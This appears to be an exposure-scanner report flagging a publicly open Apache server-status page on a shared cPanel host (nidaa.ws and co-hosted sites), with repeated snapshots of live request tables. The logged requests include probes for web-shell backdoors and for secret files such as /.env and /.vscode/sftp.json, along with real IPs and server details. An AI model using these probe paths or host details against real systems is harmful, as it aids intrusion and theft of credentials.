      4.98209061332920.034.96518.61
      52.167.144.238http/1.1albayan.edu.sa:80GET /imgweb/alselbeat.docx HTTP/1.1
      
      1-12142581/39/3415K
      5.003154823610.81.37391.34
      172.71.122.229http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-12142580/93/3882_
      4.9360640468134690.02.46529.36
      114.119.128.233http/1.1daris.live:80GET /product/37 HTTP/1.1
      
      1-12142580/24/3413_
      4.61628367196600.037.23450.20
      139.162.210.205http/1.1
      
      1-12142580/23/3913_
      4.89800063946330.04.68535.92
      66.249.64.10http/1.1albayan.edu.sa:80GET /images/slider/04.jpg HTTP/1.1
      
      1-12142580/32/3787_
      4.693661646001927</
      Found on 2024-05-23 00:04
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140017c9026

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Thursday, 16-May-2024 00:57:17 +03
      Restart Time: Monday, 29-Apr-2024 20:36:44 +03
      Parent Server Config. Generation: 14
      Parent Server MPM Generation: 13
      Server uptime:  16 days 4 hours 20 minutes 33 seconds
      Server load: 0.36 0.27 0.21
      Total accesses: 2134832 - Total Traffic: 491.4 GB - Total Duration: 5327330051
      CPU Usage: u630.7 s26.72 cu9191.94 cs2738.04 - .9% CPU load
      1.53 requests/sec - 368.5 kB/second - 241.3 kB/request - 2495.43 ms/request
      70 requests currently being processed, 0 workers gracefully restarting, 80 idle workers
      _K_______________________KKK_KK_______K_K_KK_KKKKK..............
      ................................................................
      ......................KKKK___K_____KKKKKKKKW_K__KK_______K_K__KK
      KK___KKKK_KK__K___KK__K_KKK___KKKK_K_KK_K___KK_KKKKKK__KKK......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1341150/0/12341_
      0.0004274193290.00.002813.40
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1220&t=144.76.120.197&c=5 HTT
      
      0-1341151/1/12302K
      0.0203194278230.90.002390.17
      162.158.62.91http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-1341150/0/12564_
      0.0000260345800.00.003172.84
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1285&t=148.251.69.139&c=5 HTT
      
      0-1341150/0/12372_
      0.00023239175120.00.003068.11
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-1341150/0/11893_
      0.00054215186680.00.002649.58
      4.242.218.139http/1.1daris.live:80GET /files HTTP/1.1
      
      0-1341150/0/11563_
      0.0001613487280.00.003312.44
      172.70.115.135http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-1341150/0/11728_
      0.00016524278978030.00.002779.03
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-1341150/0/11971_
      0.0000236109230.00.003245.18
      217.113.194.253http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=69&t=217.113.194.99&c=5 HTTP
      
      0-1341150/0/12153_
      0.000231152649380.00.002922.49
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      0-1341150/0/11910_
      0.00024923219347290.00.002569.33
      142.247.104.109http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-1341150/0/12275_
      0.0003115288193900.00.003245.40
      82.167.92.141http/1.1albayan.edu.sa:443GET /imgweb/cur1438/3/matst1.pdf HTTP/1.1
      
      0-1341150/0/12139_
      0.0000354766250.00.003389.99
      51.83.238.93http/1.13dvi.com:80GET /wp-content/themes/twentystd/ HTTP/1.1
      
      0-1341150/0/11623_
      0.0000239537860.00.002575.40
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1330&t=65.108.0.71&c=5 HTTP/1
      
      0-1341150/0/11940_
      0.0000252518190.00.002597.20
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=167.114.64.97&c=5 HTTP
      
      0-1341150/0/12254_
      0.0000268151570.00.002915.74
      172.70.251.81http/1.1nidaa.ws:80GET /.well-known/pki-validation/807A888B253E7AF7A80C419531042AC
      
      0-1341150/0/12083_
      0.000428216132000.00.002999.67
      192.30.83.56http/1.1sulaimaniya.edu.sa:443GET / HTTP/1.1
      
      0-1341150/0/11804_
      0.0000217896260.00.002492.98
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=195.191.219.131&c=5 HT
      
      0-1341150/0/12118_
      0.0003314459940.00.002891.96
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1715810093.29975795745849609375
      
      0-1341150/0/11690_
      0.0009242255040.00.002988.46
      217.113.194.243http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1903 HTTP/1.1
      
      0-1341150/0/11413_
      0.00025233701940.00.002812.87
      195.191.219.130http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%AA%D9%86%D8%B6%D8%A8%D8%A7%D8%B7%20%D8%A
      
      0-1341150/0/12034_
      0.0000213129150.00.002596.11
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1219&t=195.191.219.130&c=5 HT
      
      0-1341150/0/12235_
      0.0003245745600.00.002606.05
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1298&t=65.108.0.71&c=5 HTTP/1
      
      0-1341150/0/11860_
      0.0000327135340.00.003006.13
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1300&t=3.239.192.241&c=5 HTTP
      
      0-1341150/0/11504_
      0.00058228349180.00.003177.30
      4.242.218.139http/1.1daris.live:80GET /uploads HTTP/1.1
      
      0-1341150/0/12982_
      0.0000359144230.00.002894.29
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1337&t=194.247.173.99&c=5 HTT
      
      1-1336271/2/12589K
      0.3511275595770.90.132468.81
      172.70.242.6http/1.1nidaa.ws:80GET /_all_dbs HTTP/1.1
      
      1-13362726/26/12125K
      0.37142294532821.90.023009.38
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1251&t=45.77.142.238&c=5 HTTP
      
      1-1336271/3/11881K
      0.3711270582640.80.003062.14
      162.158.86.73http/1.1nidaa.ws:80GET /telescope/requests HTTP/1.1
      
      1-1336270/3/11403_
      0.27985965233820.00.012715.43
      139.59.132.8http/1.1albayan.akgsa.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-1336271/2/11547K
      0.3711276409910.80.182766.30
      172.69.150.189http/1.1nidaa.ws:80GET /.env HTTP/1.1
      
      1-1336271/3/12602K
      0.3801366247720.90.153107.12
      162.158.63.159http/1.1nidaa.ws:80<
      Found on 2024-05-15 21:57
  • Apache server-status page is publicly available
    First seen 2024-05-15 21:57
    Last seen 2024-06-20 01:51
    Open for 35 days
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140871055dd

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 20-Jun-2024 04:52:01 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  9 days 48 minutes 56 seconds
      Server load: 0.23 0.08 0.06
      Total accesses: 753184 - Total Traffic: 85.9 GB - Total Duration: 1789149231
      CPU Usage: u404.98 s26.09 cu3345.47 cs698.97 - .573% CPU load
      .965 requests/sec - 115.4 kB/second - 119.6 kB/request - 2375.45 ms/request
      24 requests currently being processed, 0 workers gracefully restarting, 201 idle workers
      ________K______K_______________KK__K_____________________KK_____
      ____________________________K_K__K_________KK________________...
      ......................____K___________K_______K____W______K_____
      _K________K______________K______K_K_____K______K__________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-574350/4/3366_
      0.673773303909640.00.16341.22
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-apxupx.php?apx=upx HTTP/1.1
      
      0-574350/1/2937_
      0.02438412546900.00.01326.38
      2.90.27.89http/1.1
      
      0-574350/6/3026_
      0.69227634821370.00.18421.92
      54.36.149.92http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=220 HTTP/1.1
      
      0-574350/4/3178_
      0.67341646526960.00.23248.88
      54.36.148.164http/1.1albayan.edu.sa:443GET /web/484.html2 HTTP/1.1
      
      0-574350/4/3309_
      0.701732056157340.00.05364.56
      66.249.66.34http/1.1akg.sa:443GET /?hypothecate/crossband1855283.html HTTP/1.1
      
      0-574350/7/2975_
      0.6041139185190.01.36414.58
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/themes/finley/min.php HTTP/1.1
      
      0-574350/6/3318_
      0.6240235839320.01.78294.91
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1
      
      0-574350/5/3276_
      0.6339439850530.00.04277.27
      72.167.40.218http/1.1php.we3dvi.com:443GET /images/alfa-rex.php7 HTTP/1.1
      
      0-574351/5/3050K
      0.74118551740.90.37202.48
      172.70.246.16http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-574350/7/3117_
      0.682901317902890.00.73613.06
      66.249.66.81http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1605 HTTP/1.1
      
      0-574350/3/3249_
      0.5642639208470.00.74327.77
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-admin/maint/wp-login.php HTTP/1.1
      
      0-574350/3/3153_
      0.59419312256920.00.99392.41
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/proxy/css.php HTTP/1.1
      
      0-574350/3/3059_
      0.55431393045240.00.76204.56
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1
      
      0-574350/4/3344_
      0.738077865720.00.07233.46
      54.36.148.108http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1126 HTTP/1.1
      
      0-574350/3/3286_
      0.59415324418220.01.21632.25
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/press/css.php HTTP/1.1
      
      0-574351/4/3350K
      0.74008057550.80.14328.45
      162.158.87.17http/1.1nidaa.ws:80GET /.DS_Store HTTP/1.1
      
      0-574350/4/3205_
      0.6538634050870.00.14272.21
      72.167.40.218http/1.1php.we3dvi.com:443GET /well.php?p= HTTP/1.1
      
      0-574350/4/3124_
      0.66381311357790.00.63357.12
      72.167.40.218http/1.1php.we3dvi.com:443GET /img/xmrlpc.php?p= HTTP/1.1
      
      0-574350/4/3036_
      0.731775917750.00.14250.17
      54.36.149.82http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1128 HTTP/1.1
      
      0-574350/3/2635_
      0.5443537221040.00.26347.30
      72.167.40.218http/1.1php.we3dvi.com:443GET /.well-known/pki-validation/atomlib.php HTTP/1.1
      
      0-574350/3/2926_
      0.584233846319180.00.45325.91
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-includes/pomo/wp-login.php HTTP/1.1
      
      0-574350/4/3130_
      0.6438939068860.00.46220.20
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-admin/dropdown.php HTTP/1.1
      
      0-574350/4/3176_
      0.6239815037640.00.04348.32
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-includes/themes.php HTTP/1.1
      
      0-574350/5/3022_
      0.729549801840.00.05454.85
      207.46.13.14http/1.1albayan.edu.sa:443GET /e_sch/code/news/ HTTP/1.1
      
      0-574350/3/3192_
      0.61406314086930.00.03313.44
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-consar.php HTTP/1.1
      
      1-578690/2/3300_
      0.263753635203560.00.03437.07
      72.167.40.218http/1.1php.we3dvi.com:443GET /.well-known/index.php HTTP/1.1
      
      1-578690/2/2910_
      0.2732207139770.00.02354.44
      216.244.66.198http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      1-578690/5/3236_
      0.2919811626955130.00.07267.30
      185.191.171.19http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1429 HTTP/1.1
      
      1-578690/2/3218_
      0.28279477300960.00.05183.23
      54.36.149.16http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1670&page=1 HTTP/1.1
      
      1-578690/2/3278_
      0.3050147681350.00.03199.90
      185.191.171.14http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1138 HTTP/1.1
      
      1-578690/3/3174_
      0.2911409578830.00.07332.65
      185.234.71.90http/1.1albayan.edu.sa:80GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1
      
      1-578691/2/3238K
      0.301111275620.80.02848.21
      162.158.86.142http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-578691/2/2915K
      0.30015796920.80.02282.92
      172.70.90.72http/1.1nidaa.ws:8
      Found on 2024-06-20 01:51
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140d55c2b47

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 20-Jun-2024 04:52:00 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  9 days 48 minutes 55 seconds
      Server load: 0.08 0.05 0.05
      Total accesses: 753171 - Total Traffic: 85.9 GB - Total Duration: 1789149054
      CPU Usage: u404.91 s26.06 cu3345.47 cs698.97 - .573% CPU load
      .965 requests/sec - 115.4 kB/second - 119.6 kB/request - 2375.49 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 214 idle workers
      ________K______________________K_________________________K______
      ______________________________K____________K_________________...
      ......................________________K_______K_________________
      _K________W_____________________K_K_______________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-574350/4/3366_
      0.673763303909640.00.16341.22
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-apxupx.php?apx=upx HTTP/1.1
      
      0-574350/1/2937_
      0.02437412546900.00.01326.38
      2.90.27.89http/1.1
      
      0-574350/6/3026_
      0.69226634821370.00.18421.92
      54.36.149.92http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=220 HTTP/1.1
      
      0-574350/4/3178_
      0.67340646526960.00.23248.88
      54.36.148.164http/1.1albayan.edu.sa:443GET /web/484.html2 HTTP/1.1
      
      0-574350/4/3309_
      0.701722056157340.00.05364.56
      66.249.66.34http/1.1akg.sa:443GET /?hypothecate/crossband1855283.html HTTP/1.1
      
      0-574350/7/2975_
      0.6041039185190.01.36414.58
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/themes/finley/min.php HTTP/1.1
      
      0-574350/6/3318_
      0.6240135839320.01.78294.91
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1
      
      0-574350/5/3276_
      0.6339339850530.00.04277.27
      72.167.40.218http/1.1php.we3dvi.com:443GET /images/alfa-rex.php7 HTTP/1.1
      
      0-574351/5/3050K
      0.74018551740.90.37202.48
      172.70.246.16http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-574350/7/3117_
      0.682891317902890.00.73613.06
      66.249.66.81http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1605 HTTP/1.1
      
      0-574350/3/3249_
      0.5642639208470.00.74327.77
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-admin/maint/wp-login.php HTTP/1.1
      
      0-574350/3/3153_
      0.59418312256920.00.99392.41
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/proxy/css.php HTTP/1.1
      
      0-574350/3/3059_
      0.55430393045240.00.76204.56
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1
      
      0-574350/4/3344_
      0.737977865720.00.07233.46
      54.36.148.108http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1126 HTTP/1.1
      
      0-574350/3/3286_
      0.59414324418220.01.21632.25
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-content/plugins/press/css.php HTTP/1.1
      
      0-574350/3/3349_
      0.5443838057530.00.14328.45
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-admin/index.php?3x=3x HTTP/1.1
      
      0-574350/4/3205_
      0.6538534050870.00.14272.21
      72.167.40.218http/1.1php.we3dvi.com:443GET /well.php?p= HTTP/1.1
      
      0-574350/4/3124_
      0.66381311357790.00.63357.12
      72.167.40.218http/1.1php.we3dvi.com:443GET /img/xmrlpc.php?p= HTTP/1.1
      
      0-574350/4/3036_
      0.731675917750.00.14250.17
      54.36.149.82http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1128 HTTP/1.1
      
      0-574350/3/2635_
      0.5443437221040.00.26347.30
      72.167.40.218http/1.1php.we3dvi.com:443GET /.well-known/pki-validation/atomlib.php HTTP/1.1
      
      0-574350/3/2926_
      0.584223846319180.00.45325.91
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-includes/pomo/wp-login.php HTTP/1.1
      
      0-574350/4/3130_
      0.6438839068860.00.46220.20
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-admin/dropdown.php HTTP/1.1
      
      0-574350/4/3176_
      0.6239715037640.00.04348.32
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-includes/themes.php HTTP/1.1
      
      0-574350/5/3022_
      0.729549801840.00.05454.85
      207.46.13.14http/1.1albayan.edu.sa:443GET /e_sch/code/news/ HTTP/1.1
      
      0-574350/3/3192_
      0.61405314086930.00.03313.44
      72.167.40.218http/1.1php.we3dvi.com:443GET /wp-consar.php HTTP/1.1
      
      1-578690/2/3300_
      0.263743635203560.00.03437.07
      72.167.40.218http/1.1php.we3dvi.com:443GET /.well-known/index.php HTTP/1.1
      
      1-578690/2/2910_
      0.2732107139770.00.02354.44
      216.244.66.198http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      1-578690/5/3236_
      0.2919711626955130.00.07267.30
      185.191.171.19http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1429 HTTP/1.1
      
      1-578690/2/3218_
      0.28278477300960.00.05183.23
      54.36.149.16http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1670&page=1 HTTP/1.1
      
      1-578690/2/3278_
      0.3049147681350.00.03199.90
      185.191.171.14http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1138 HTTP/1.1
      
      1-578690/3/3174_
      0.2911309578830.00.07332.65
      185.234.71.90http/1.1albayan.edu.sa:80GET /wp-content/plugins/google-seo-rank/module.php HTTP/1.1
      
      1-578691/2/3238K
      0.300111275620.80.02848.21
      162.158.86.142http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-578690/1/2914_
      0.1244515796880.00.02282.92
      72.167.40.218http/1.1
      Found on 2024-06-20 01:51
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140a1105f67

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 18:34:21 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 14 hours 31 minutes 16 seconds
      Server load: 0.01 0.02 0.05
      Total accesses: 639162 - Total Traffic: 73.5 GB - Total Duration: 1644510859
      CPU Usage: u330.23 s19.38 cu2818.08 cs598.64 - .573% CPU load
      .973 requests/sec - 117.3 kB/second - 120.6 kB/request - 2572.92 ms/request
      19 requests currently being processed, 0 workers gracefully restarting, 81 idle workers
      __________K_KKW__________.........................K_K__K_____K__
      _____K_____.....................................................
      ......................_______K_____KKKK________.................
      ................................................................
      ...................________________KKKKK____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5262710/1/2756_
      0.03202115304302421630.01.99299.98
      202.86.216.189http/1.1albayan.edu.sa:443GET /imgweb/book/jamealolom.pdf HTTP/1.1
      
      0-5262710/1/2412_
      0.0129038363250.00.01275.43
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718724570.82768511772155761718
      
      0-5262710/2/2463_
      0.041976733104810.00.02341.32
      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-5262710/2/2558_
      0.0616223723690.00.01211.48
      66.249.66.83http/1.1albayan.edu.sa:443GET /imgweb/file44/7th-T3-QB%20-%2023.pdf HTTP/1.1
      
      0-5262710/1/2733_
      0.07123455632460.00.02339.47
      94.156.68.8http/1.1sradmin.3dvi.com:443GET /wp-content/plugins/core-plugin/include.php HTTP/1.1
      
      0-5262710/1/2398_
      0.0890423480970.00.02349.01
      94.156.68.8http/1.1sradmin.3dvi.com:443GET /wp-includes/images/include.php HTTP/1.1
      
      0-5262710/1/2711_
      0.088544516180.00.00252.15
      66.249.66.38http/1.1hawsab.me:80GET /?pyg19118.html HTTP/1.1
      
      0-5262710/1/2815_
      0.106433850390.00.01228.81
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-5262710/1/2484_
      0.1038113575890.00.01159.19
      162.158.118.118http/1.1adyar.com.sa:80POST / HTTP/1.1
      
      0-5262710/1/2501_
      0.100214071250.00.00542.96
      94.156.68.8http/1.1filter.jawad.com.sa:80GET /wp-content/plugins/core-plugin/include.php HTTP/1.1
      
      0-5262711/1/2730K
      0.11027178740.80.00268.05
      172.71.183.121http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-5262710/1/2650_
      0.11039421200.00.07343.24
      172.71.102.77http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5262711/1/2447K
      0.110190676760.80.00167.73
      172.70.250.253http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-5262711/1/2587K
      0.11015359180.80.00187.05
      172.70.251.24http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-5262710/0/2798W
      0.00009159640.00.00514.94
      172.70.250.45http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-5262710/0/2824_
      0.00348186596760.00.00285.78
      141.101.97.84http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-5262710/0/2648_
      0.0034822845970.00.00222.59
      172.71.134.33http/1.1qr.brunch.ws:443GET /storage/food_image/17095827544263_edamcroissant.jpg HTTP/1
      
      0-5262710/0/2480_
      0.0034826283050.00.00321.11
      172.71.135.2http/1.1qr.brunch.ws:443GET /storage/food_image/17088572566240_img6ba5d51d4fb949a39e5e6
      
      0-5262710/0/2524_
      0.0034824555710.00.00214.07
      172.69.223.115http/1.1qr.brunch.ws:443GET /storage/food_image/17088473288673_img3a0124b801a84169b7c46
      
      0-5262710/0/2152_
      0.0034824732690.00.00300.28
